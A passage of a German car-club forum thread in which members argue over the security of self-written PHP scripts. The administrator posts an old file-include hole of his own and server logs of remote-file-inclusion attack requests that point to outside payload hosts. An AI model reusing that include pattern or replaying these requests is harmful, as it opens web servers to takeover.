top.gif end.gif
logo.gif button_home button_idee button_mitglieder button_termine button_suchen button_forum button_gallery button_links button_kontakt button_help
bottom.gif

Zurück   Hamburg-Hondaz > Allgemeines > Anregungen/Kritik

 
 
Themen-Optionen Ansicht
Alt 10.02.2009, 15:04   #41
Kvn
Neuer Benutzer
 
Benutzerbild von Kvn
 
Registriert seit: 09.02.2009
Beiträge: 20
Standard

Zitat:
Zitat von mjay Beitrag anzeigen
Wie gesagt, 5 würden auch noch locker gehen, sooo klein ist der Server auch wieder nicht. Nur bei Bildern von Treffen (also wenn so 20-200 Stück zusammenkommen), habe ich gerne weiterhin den Finger drauf.
[...]
Den Teil mit der Eingabe würde ich mir ganz gerne mal angucken. Mit sowas habe ich nämlich auch schon einiges verbockt und deswegen wie gesagt ein leicht flaues Gefühl im Magen.
Hi,
Ich setzt nochmal ein Uploadfeld mehr rein.
Die 2 Dateien, die zum Profil gehören schick ich dir per PN.
Da müsstest du dann eigentlich auch sehen, wie ich das mit den Rechten gelöst habe.
Kvn ist offline  
Alt 10.02.2009, 23:25   #42
Jule
Erfahrener Benutzer
 
Benutzerbild von Jule
 
Registriert seit: 21.04.2003
Ort: Norderstedt
Beiträge: 1.878
Standard

das is jetzt ja mit scripten und so programmiert oder?!

ich hab mal gelesen (frag mich nicht mehr wo), dass sowas immer leicht und gerne gehackt wird, wenn man es drauf anlegt...also ich stimm mjay mit seinen bauchweh mal zu!

gibts da nicht dann noch ne andere möglichkeit?? ich kenn mich nicht aus, daher mag das alles etwas blöd formuliert rüber kommen...
__________________
Bis Mai 2006: Honda Civic ED6
Bis Juli 2007: VW Golf 3 Cabrio - mein ganzer Stolz
Bis August 2009: Opel Corsa D
Bis August 2010: FORD KAAAAAAA
und nun fiat punto!
Jule ist offline  
Alt 10.02.2009, 23:58   #43
ScHaKaL
Erfahrener Benutzer
 
Benutzerbild von ScHaKaL
 
Registriert seit: 01.10.2002
Beiträge: 1.862
Standard

jop ... also ich muss auch sagen das ich von diesem ganzen selbst programmierten rumgescripte nix halte... dein können in allen Ehren ! und ich freu mich wirklich das ihr hier mit so nem Einsatz dabei seid, aber solche scripts sollten doch lieber von Profis kommen
und da wirds sicher auch was gutes für unser forum geben...

die designvorschläge allerdings find ich teils echt sehr gut gelungen ! da sollten wir weiter machen !
__________________
Signatur ? Hab keine !
ScHaKaL ist offline  
Alt 11.02.2009, 07:43   #44
Kvn
Neuer Benutzer
 
Benutzerbild von Kvn
 
Registriert seit: 09.02.2009
Beiträge: 20
Standard

Bisher hatte ich noch nie Probleme in Richtung Sicherheit, zumal das hier nicht die Seite der Regierung von Amerika ist.
Wenn man will, klar, dann kann man alles hacken, aber wie gesagt, das war bei mir noch nie der Fall. Das Forum kann man auch mit ein wenig Zeitinvestiertung hacken. Einfach über einen Adminaccount 'nen BruteForce laufen lassen, je nach Leistung des PCs 1-7Tage warten und fertig.

Wenn ihr das Ganze aber von nem Profi machen lassen wollt, kann das ganz schön was kosten. (~45 - 60€/std)
Kvn ist offline  
Alt 11.02.2009, 08:45   #45
Jule
Erfahrener Benutzer
 
Benutzerbild von Jule
 
Registriert seit: 21.04.2003
Ort: Norderstedt
Beiträge: 1.878
Standard

mein einwand war nun nicht böse gemeint... ich find das design auch richtig klasse, was du da bisher umgesetzt hast und würde das gerne hier auf der hp haben!

aber gibt es da nicht noch einen anderen weg für?!

keine ahnung, falls nicht, dann würd ich es aufn versuch ankommen lassen und einfach mal schauen wie es sich auswirkt!
__________________
Bis Mai 2006: Honda Civic ED6
Bis Juli 2007: VW Golf 3 Cabrio - mein ganzer Stolz
Bis August 2009: Opel Corsa D
Bis August 2010: FORD KAAAAAAA
und nun fiat punto!
Jule ist offline  
Alt 11.02.2009, 11:36   #46
Starbird
News-Moderator
 
Benutzerbild von Starbird
 
Registriert seit: 02.07.2002
Ort: Stade
Beiträge: 2.849
Standard

@Kvn: Ich denke das Problem ist ganz einfach, dass wir schon massiv Probleme wegen Scripten hatten. Natürlich ist alles hackbar, aber wie gesagt, es gab hier Probleme wegen eigenen Scripten, seitdem die raus sind ist alles friedlich.

Ich persöpnlich weiß gerade nicht so genau wie meine Meinung dazu ist. Ich finde die Geschichte die Kvn da gebaut hat wirklich sehr gelungen und möchte ungern drauf verzichten, wenn's allerdings n deutlich höheres Sicherheitsrisiko darstellt ist's natürlich nicht so klasse... kenne mich aber mit der Programmiererei auch deutlich zu wenig aus um da was zu sagen zu können...
__________________
Es geht nicht um die PS... es geht um den Haufen!!!
Starbird ist offline  
Alt 11.02.2009, 12:18   #47
Kvn
Neuer Benutzer
 
Benutzerbild von Kvn
 
Registriert seit: 09.02.2009
Beiträge: 20
Standard

Hi

Wie gesagt, ich hatte noch nie Probleme in Richtung Sicherheit.
Ich tippe hier gerade von einem iPod Touch deswegen werde ich jetzt Aufhören und Zuhause weiter schreiben.

*edit*
So, hier gehts weiter.

Ich habe auf jeder Datei, die nur eingeloggte sehen sollen eine Abfrage drin:
Zitat:
if(session_is_registered('user'))
{
#Datei
}
else
{
#Wieder zurück zum Login.
}
Damit wird abgefragt, ob die Session des users registriert ist, oder nicht.
in den Teilen, wo nur bestimmte eingeloggte User etwas machen können (News schreiben z.B.) ist ebenfalls eine ähnliche Abfrage drin, die aus einer anderen, externen, Datei (zusätzliche Sicherheit) die Usernamen holt, die eben diesen Bereich sehen dürfen.


mfg Kevin

Geändert von Kvn (11.02.2009 um 17:26 Uhr) Grund: weiterschreiben...
Kvn ist offline  
Alt 11.02.2009, 20:25   #48
Starbird
News-Moderator
 
Benutzerbild von Starbird
 
Registriert seit: 02.07.2002
Ort: Stade
Beiträge: 2.849
Standard

Joah, da warte ich mal die Reaktionen derer ab, die davon Ahnung haben.
Die 3 programmierzeilen verstehe ich zwar, in wiefern das aber was mit Sicherheit oder nicht zu tun hat mag ich nicht im Geringsten abzuschätzen.

Also mjay, Schakal, Murat, haut in die Tasten
__________________
Es geht nicht um die PS... es geht um den Haufen!!!
Starbird ist offline  
Alt 11.02.2009, 20:41   #49
Murat
Turbo-Mod
 
Benutzerbild von Murat
 
Registriert seit: 02.07.2002
Ort: Kiel
Beiträge: 5.300
Standard

Also vom Programmieren ansich hab ich auch nicht die große Ahnung, aber Skripte sind in meinen Augen immer ein großes Sicherheitsrisiko. Jedes Skript ist irgendwie manipulierbar... Und auch wenn wir nicht die Geheimakten der Stasi hier hüten wollen, denke ich, muss man sich ja nicht jedem semi-professionellem Hacker aussetzen. Insbesondere, weils für solche Sachen ja auch direkt von vBulletin fertige Teile gibt (natürlich nur kostenpflichtig).
Aber eines möchte ich dennoch klarstellen: ich habe absolut riesigen Respekt vor deiner Arbeit und was du dir für uns "unbekannten" Haufen vor nimmst! Meine negative Einstellung gilt auch nur den Skripten gegenüber - alles andere (wie das Design oder wie auch immer) finde ich absolut top und da habe ich gegen Veränderungen auch absolut nichts entgegen zu setzen! Ich sage das nur, damit das nicht falsch aufgenommen wird oder du das auf deine gesamte Arbeit beziehst...
__________________
Hier könnte Ihre Werbung stehen!
Murat ist offline  
Alt 11.02.2009, 21:18   #50
mjay
Administrator
 
Benutzerbild von mjay
 
Registriert seit: 26.06.2002
Ort: HH-Rahlstedt
Beiträge: 6.375
Standard

Zitat:
Zitat von Kvn Beitrag anzeigen
if(session_is_registered('user'))
Hm, dazu fällt mir auf jeden Fall schonmal folgendes zu ein:
http://www.php.net/manual/en/functio...registered.php

Ansonsten schliesse ich mich mal Murat an (bis auf den Teil mit den Programmierkenntnissen ).
__________________
Nur Idioten halten Ordnung, ein Genie beherrscht das Chaos.
mjay ist offline  
Alt 11.02.2009, 21:38   #51
Kvn
Neuer Benutzer
 
Benutzerbild von Kvn
 
Registriert seit: 09.02.2009
Beiträge: 20
Standard

Naja, ich könnte natürlich auch mit if(isset($_SESSION['user'])) arbeiten, bisher bin ich allerdings mit session_is_registered() immer gut gelaufen.

Wenn du noch Tipps in Richtung SIcherheit hast, nur her damit
Kvn ist offline  
Alt 19.02.2009, 12:42   #52
Starbird
News-Moderator
 
Benutzerbild von Starbird
 
Registriert seit: 02.07.2002
Ort: Stade
Beiträge: 2.849
Standard

Gibt's Neuigkeiten?
__________________
Es geht nicht um die PS... es geht um den Haufen!!!
Starbird ist offline  
Alt 19.02.2009, 21:20   #53
Kvn
Neuer Benutzer
 
Benutzerbild von Kvn
 
Registriert seit: 09.02.2009
Beiträge: 20
Standard

Ich warte zur Zeit noch auf eine Rückmeldung von mjay, ob ich das nun machen soll, oder nicht. Ich möchte mir den Aufwand nicht umsonst machen.

(Ich bin übrigens der Meinung, dass ihr das mit der Sicherheit ein ganz kleines bisschen übertreibt. -> Ihr seit nicht der Rechner von Raketenabschussbasen)
Kvn ist offline  
Alt 19.02.2009, 21:30   #54
HotWheel
Gast
 
Beiträge: n/a
Standard

www.seidseit.de
 
Alt 19.02.2009, 22:11   #55
Jere
Erfahrener Benutzer
 
Benutzerbild von Jere
 
Registriert seit: 26.01.2005
Ort: Berlin
Beiträge: 1.622
Standard

Homepage ändern!!!!
__________________
Show Show Show Show

Verdammt ich glaub die BE ist erloschen
Polizei am Lasergerät?! Da nehmen wir den zweiten Gang.
Jere ist offline  
Alt 19.02.2009, 22:54   #56
mjay
Administrator
 
Benutzerbild von mjay
 
Registriert seit: 26.06.2002
Ort: HH-Rahlstedt
Beiträge: 6.375
Standard

Zitat:
Zitat von Kvn Beitrag anzeigen
Ich warte zur Zeit noch auf eine Rückmeldung von mjay, ob ich das nun machen soll, oder nicht. Ich möchte mir den Aufwand nicht umsonst machen.
Für Homepage anpassen wäre ich zu begeistern.
Aber von den Skripten würde ich wohl doch lieber Abstand nehmen. Da gibt es leider zu viele Möglichkeiten, die einen Angriff auf den Server ermöglichen würden.

Zitat:
Zitat von Kvn Beitrag anzeigen
(Ich bin übrigens der Meinung, dass ihr das mit der Sicherheit ein ganz kleines bisschen übertreibt. -> Ihr seit nicht der Rechner von Raketenabschussbasen)
Über diese Aussage ärgere ich mich ehrlich gesagt ein bisschen...
Wir sind eine kleine Seite wie Millionen andere. Allerdings sind unter diesen Millionen anderen auch welche, die sich nicht für eine Raketenabschussbasis halten und deswegen nicht auf die Sicherheit achten. Und über diese Rechner wird Spam versendet, es werden andere Rechner infiziert, DOS-Attacken gefahren, Viren verteilt und so weiter...
Ausserdem sind auf unserem Server z.B. Userdaten gespeichert und es werden E-Mails versendet. Ich möchte einfach, dass diese Daten alle sicher sind und sich nicht irgendein Schlumpf Zugriff verschafft und Scheisse damit baut.

Hier mal die letzte (mir bekannte) von mir verursachte Sicherheitslücke, die auch prompt gefunden und ausgenutzt wurde. Wer findet die Schwachstelle?

PHP-Code:
<?php

$loc
=$_GET['loc'];

  if (!isset(
$loc)) {
    include(
"home.php");
  }

  if (isset(
$loc)) {
    include(
$loc.".php");
  }
?>
(Dieser Code existiert nicht mehr in dieser Form auf der Seite, da sind jetzt noch einige Zeilen dazugekommen um die Sicherheitslücke zu schliessen.)

Und dann hatte ich mal ein News-Skript programmiert, wo man auch über PHP Daten in ein Formular einlesen konnte, welche dann auf irgendeiner Seite angezeigt werden sollten. Da wurde schon das Feld für die Passwortabfrage genutzt, um einen Wurm auf dem Server abzulegen.

Auf solche Nummern habe ich echt keinen Bock. Kann natürlich trotzdem immer passieren, aber ich möchte das Risiko minimieren.
__________________
Nur Idioten halten Ordnung, ein Genie beherrscht das Chaos.
mjay ist offline  
Alt 20.02.2009, 16:25   #57
Kvn
Neuer Benutzer
 
Benutzerbild von Kvn
 
Registriert seit: 09.02.2009
Beiträge: 20
Standard

Hallo,

zu dem Code.
Dort kann man natürlich einfach bei loc in der Adresszeile alles reinschreiben was man will, um so auf den Adminbereich zu kommen. Das passiert allerdings nur, wenn man keine Abfrage auf die einzelnen Dateien setzt, ob der User dafür überhaupt die Rechte hat.

Nochmal zum Thema Sicherheit.
Man kann natürlich alles knacken, dürfte bekannt sein. Sollte aber die Datenbank gehackt werden, wird man nur Passwörter als MD5-Hash finden.
In diesem Format wird auch an den Server gesendet, als MD5-Hash.

Ich persönlich finde eine Website ohne ACP/Login/Userbereich nicht mehr alzu Modern, da es vorallem auch für den Admin, eine Menge an Arbeit sparen kann. Bilder ändern, Daten ändern etc. Das ganze bei ner Menge Usern wird zeitaufwändig, müsste ja bekannt sein.

Naja, bleibt nur noch der Standardsatz, dass ich bisher damit noch nie Probleme hatte. (Übrigens: Ich hatte einmal eine Website erstellt für einen Betrieb, dabei habe ich den Auftrag über eine Agentur bekommen. In der arbeiten auch ausgebildete Programmierer und Webdesigner, die alle mit dieser Methode arbeiten, so unsicher kann es also nicht sein.)
Dazu natürlich noch, das es für einen Hacker viel interessanter wäre, websites wie amazon/ebay etc zu hacken, da dort richtig Kohle zu machen ist.

Ich hoffe, dass ich dich vielleicht doch umstimmen konnte und mir die Arbeit mit den PHP-Teilen nicht umsonst gemacht habe.

MfG Kevin
Kvn ist offline  
Alt 23.02.2009, 11:25   #58
mjay
Administrator
 
Benutzerbild von mjay
 
Registriert seit: 26.06.2002
Ort: HH-Rahlstedt
Beiträge: 6.375
Standard

Zitat:
Zitat von Kvn Beitrag anzeigen
Hallo,

zu dem Code.
Dort kann man natürlich einfach bei loc in der Adresszeile alles reinschreiben was man will, um so auf den Adminbereich zu kommen. Das passiert allerdings nur, wenn man keine Abfrage auf die einzelnen Dateien setzt, ob der User dafür überhaupt die Rechte hat.
Nicht ganz. Man kann fremde Sachen einbinden, die dann so ausgeführt werden, als ob sie vom eigenen Server kommen. Da nützen dann auch Zugriffsrechte nix mehr, die sich auf Zugriffe von ausserhalb beziehen.

Zitat:
Zitat von Kvn Beitrag anzeigen
Ich persönlich finde eine Website ohne ACP/Login/Userbereich nicht mehr alzu Modern, da es vorallem auch für den Admin, eine Menge an Arbeit sparen kann. Bilder ändern, Daten ändern etc. Das ganze bei ner Menge Usern wird zeitaufwändig, müsste ja bekannt sein.
Damit hast Du definitiv Recht. Aber ich habe weiterhin Sorge wegen der Sicherheit. Deswegen passe ich sehr auf, dass ich immer die aktuellsten Versionen einer Software auf dem Rechner habe - und auch, dass es keine "Schlumpfsoftware" ist.

Zitat:
Zitat von Kvn Beitrag anzeigen
Naja, bleibt nur noch der Standardsatz, dass ich bisher damit noch nie Probleme hatte.
Ich habe im Moment keine Probleme, weil das vBulletin relativ sicher ist und ihm Angriffe nichts ausmachen. Ansonsten wäre hier aufgrund der täglichen Angriffe sicherlich schon einiges platt.

Nehmen wir nur mal den heutigen Tag:
Code:
196.40.XXX.XXX - - [23/Feb/2009:00:21:06 +0100] "GET /forum//impex/index.php?systempath=http://www.XXX.de/apboard/fx29id1.txt? HTTP/1.1" 404 1031 "-" "Mozilla/5.0"
211.202.XXX.XXX - - [23/Feb/2009:00:24:56 +0100] "GET /impex/ImpExController.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 301 419 "-" "libwww-perl/5.79"
196.40.XXX.XXX - - [23/Feb/2009:00:27:13 +0100] "GET /forum/showthread.php?t=5831%20%20//impex/index.php?systempath=http://www.XXX.de/apboard/fx29id1.txt? HTTP/1.1" 200 126221 "-" "Mozilla/5.0"
125.251.XXX.XXX - - [23/Feb/2009:00:34:01 +0100] "GET /forum/showthread.php?t=5831//impex/index.php?systempath=http://www.XXX.de/apboard/fx29id1.txt? HTTP/1.1" 200 125762 "-" "Mozilla/5.0"
211.233.XXX.XXX - - [23/Feb/2009:00:38:47 +0100] "GET /impex/ImpExController.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 1031 "-" "libwww-perl/5.65"
211.233.XXX.XXX - - [23/Feb/2009:00:38:47 +0100] "GET /impex/ImpExModule.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 1031 "-" "libwww-perl/5.65"
211.202.XXX.XXX - - [23/Feb/2009:00:40:51 +0100] "GET /arcade.php?do=stats&gameid=111/impex/ImpExModule.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 301 450 "-" "libwww-perl/5.79"
211.202.XXX.XXX - - [23/Feb/2009:00:41:20 +0100] "GET /showthread.php?t=131/impex/ImpExDisplay.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 301 437 "-" "libwww-perl/5.79"
211.202.XXX.XXX - - [23/Feb/2009:00:41:20 +0100] "GET /showthread.php?t=131/impex/ImpExData.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 301 434 "-" "libwww-perl/5.79"
211.202.XXX.XXX - - [23/Feb/2009:00:41:20 +0100] "GET /showthread.php?t=131/impex/ImpExController.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 301 440 "-" "libwww-perl/5.79"
211.202.XXX.XXX - - [23/Feb/2009:00:41:20 +0100] "GET /showthread.php?t=131/impex/ImpExModule.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 301 436 "-" "libwww-perl/5.79"
211.202.XXX.XXX - - [23/Feb/2009:00:41:20 +0100] "GET /forum/showthread.php?t=131/impex/ImpExData.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 57979 "-" "libwww-perl/5.79"
211.202.XXX.XXX - - [23/Feb/2009:00:41:20 +0100] "GET /forum/showthread.php?t=131/impex/ImpExController.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 57985 "-" "libwww-perl/5.79"
211.202.XXX.XXX - - [23/Feb/2009:00:41:20 +0100] "GET /forum/showthread.php?t=131/impex/ImpExDisplay.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 57982 "-" "libwww-perl/5.79"
211.202.XXX.XXX - - [23/Feb/2009:00:41:21 +0100] "GET /forum/showthread.php?t=131/impex/ImpExModule.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 57981 "-" "libwww-perl/5.79"
125.251.XXX.XXX - - [23/Feb/2009:00:43:01 +0100] "GET /forum/showthread.php?t=5831%20%20//impex/index.php?systempath=http://www.XXX.de/apboard/fx29id1.txt? HTTP/1.1" 200 125768 "-" "Mozilla/5.0"
211.233.XXX.XXX - - [23/Feb/2009:02:09:46 +0100] "GET /forum/impressum.php/impex/ImpExController.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 21661 "-" "libwww-perl/5.65"
211.233.XXX.XXX - - [23/Feb/2009:02:09:46 +0100] "GET /forum/impressum.php/impex/ImpExData.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 21655 "-" "libwww-perl/5.65"
211.233.XXX.XXX - - [23/Feb/2009:02:09:47 +0100] "GET /forum/impressum.php/impex/ImpExDisplay.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 21658 "-" "libwww-perl/5.65"
211.233.XXX.XXX - - [23/Feb/2009:02:09:48 +0100] "GET /impex/ImpExController.php?systempath=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 1031 "-" "libwww-perl/5.65"
211.233.XXX.XXX - - [23/Feb/2009:02:09:48 +0100] "GET /impex/ImpExData.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 1031 "-" "libwww-perl/5.65"
211.233.XXX.XXX - - [23/Feb/2009:02:14:19 +0100] "GET /forum/member.php?u=40/impex/ImpExData.php?systempath=http://XXX.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 200 33185 "-" "libwww-perl/5.65"
65.98.XXX.XXX - - [23/Feb/2009:03:06:50 +0100] "GET /home/docs//?loc=http://XXX.ru/img/safe1.txt??? HTTP/1.1" 403 1035 "-" "libwww-perl/5.810"
65.98.XXX.XXX - - [23/Feb/2009:03:06:50 +0100] "GET //?loc=http://XXX.ru/img/safe1.txt??? HTTP/1.1" 200 1418 "-" "libwww-perl/5.810"
65.98.XXX.XXX - - [23/Feb/2009:03:06:50 +0100] "GET /home//?loc=http://XXX.ru/img/safe1.txt??? HTTP/1.1" 200 684 "-" "libwww-perl/5.810"
65.98.XXX.XXX - - [23/Feb/2009:03:15:53 +0100] "GET /home/docs/indexf.php?loc=home//?loc=http://XXX.ru/img/safe1.txt??? HTTP/1.1" 200 737 "-" "libwww-perl/5.810"
65.98.XXX.XXX - - [23/Feb/2009:03:15:53 +0100] "GET //?loc=http://XXX.ru/img/safe1.txt??? HTTP/1.1" 200 1418 "-" "libwww-perl/5.810"
65.98.XXX.XXX - - [23/Feb/2009:03:15:54 +0100] "GET /home/docs//?loc=http://XXX.ru/img/safe1.txt??? HTTP/1.1" 403 1035 "-" "libwww-perl/5.810"
80.84.XXX.XXX - - [23/Feb/2009:03:24:37 +0100] "GET /home/docs/indexf.php?loc=home//?loc=http://XXX.ru/img/safe1.txt??? HTTP/1.1" 200 737 "-" "libwww-perl/5.808"
80.84.XXX.XXX - - [23/Feb/2009:03:24:37 +0100] "GET //?loc=http://XXX.ru/img/safe1.txt??? HTTP/1.1" 200 1418 "-" "libwww-perl/5.808"
80.84.XXX.XXX - - [23/Feb/2009:03:24:37 +0100] "GET /home/docs//?loc=http://XXX.ru/img/safe1.txt??? HTTP/1.1" 403 1035 "-" "libwww-perl/5.808"
Das sind 110 "komische" Zugriffe... Ich musste einiges löschen, da das Posting sonst zu lang gewesen wäre. Ausserdem habe ich nur ganz grob gefiltert und somit nicht alles rausgesucht, was man als Angriff werten kann.
(Ich werde den Auszug aus dem Logfile demnächst wieder löschen, da dort die ganzen IP-Adressen usw. drin stehen.)

Zitat:
Zitat von Kvn Beitrag anzeigen
Dazu natürlich noch, das es für einen Hacker viel interessanter wäre, websites wie amazon/ebay etc zu hacken, da dort richtig Kohle zu machen ist.
Sicherlich sind diese Seiten interessanter, das hält aber keinen davon ab, auch unsere Seite anzugreifen.

Zitat:
Zitat von Kvn Beitrag anzeigen
Ich hoffe, dass ich dich vielleicht doch umstimmen konnte und mir die Arbeit mit den PHP-Teilen nicht umsonst gemacht habe.
Tut mir leid, aber ich habe mich dazu entschieden, keine PHP-Skripte auf dem Server zuzulassen.

EDIT: IP-Adressen und Domainnamen in den Logfiles unkenntlich gemacht.
__________________
Nur Idioten halten Ordnung, ein Genie beherrscht das Chaos.

Geändert von mjay (23.02.2009 um 22:34 Uhr)
mjay ist offline  
Alt 26.02.2009, 19:00   #59
Starbird
News-Moderator
 
Benutzerbild von Starbird
 
Registriert seit: 02.07.2002
Ort: Stade
Beiträge: 2.849
Standard

Und was wird nun?!?
__________________
Es geht nicht um die PS... es geht um den Haufen!!!
Starbird ist offline  
Alt 26.02.2009, 19:14   #60
Jere
Erfahrener Benutzer
 
Benutzerbild von Jere
 
Registriert seit: 26.01.2005
Ort: Berlin
Beiträge: 1.622
Standard

Na nun denke ich wird nichs draus wegen den Scripten
__________________
Show Show Show Show

Verdammt ich glaub die BE ist erloschen
Polizei am Lasergerät?! Da nehmen wir den zweiten Gang.
Jere ist offline  
 

Themen-Optionen
Ansicht

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.

Gehe zu

Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
FROHES NEUES JAHR!!!!!!!!!!!!!!!! bene Off-Topic 10 01.01.2005 16:46
Ein frohes neues Jahr Dragon Off-Topic 1 01.01.2005 02:02
Neues Auto / Auswahl North Off-Topic 16 28.11.2003 19:57


Alle Zeitangaben in WEZ +1. Es ist jetzt 09:18 Uhr.


Powered by vBulletin® Version 3.8.7 (Deutsch)
Copyright ©2000 - 2020, vBulletin Solutions, Inc.
Template-Modifikationen durch TMS